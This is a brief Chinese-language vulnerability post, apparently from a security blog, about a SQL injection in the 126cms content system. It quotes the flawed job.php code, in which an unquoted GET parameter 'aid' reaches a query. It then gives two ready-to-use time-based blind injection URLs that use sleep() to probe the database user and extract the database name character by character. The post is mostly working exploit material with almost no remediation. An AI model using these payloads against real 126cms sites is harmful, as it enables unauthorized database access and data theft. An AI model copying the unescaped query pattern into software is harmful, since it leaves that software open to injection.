126cms注入

126cms

下载地址:http://down.admin5.com/php/77014.html

1.漏洞文件:126cms/job.php文件第11行到22行:

if( $job == ‘updatehits’ ){

$aid = $_GET[‘aid’];
//取得 fid mid
$query = “SELECT * FROM `w6_module_content_index` WHERE `id`='”.$aid.”‘”;
$result = mysql_query($query);
$fid = mysql_result($result,”0″,”fid”);
$mid = mysql_result($result,”0″,”mid”);

$query = “SELECT `aid`,`count` FROM `w6_module_content_$mid` WHERE `aid`=$aid”;

$result = mysql_query($query);

直接代入’ “会被转义

$query = “SELECT `aid`,`count` FROM `w6_module_content_$mid` WHERE `aid`=$aid”;

这条语句没有被单引号括起来,可以使用时间盲注

sql injection :

payload:126cms/job.php?job=updatehits&aid=2%20and%20if(user()=current_user(),sleep(0.3),1)

payload:126cms/job.php?job=updatehits&aid=2%20and%20if(mid(database(),1,1)=0x31,sleep(0.2),1)

 

0 条评论
发表一条评论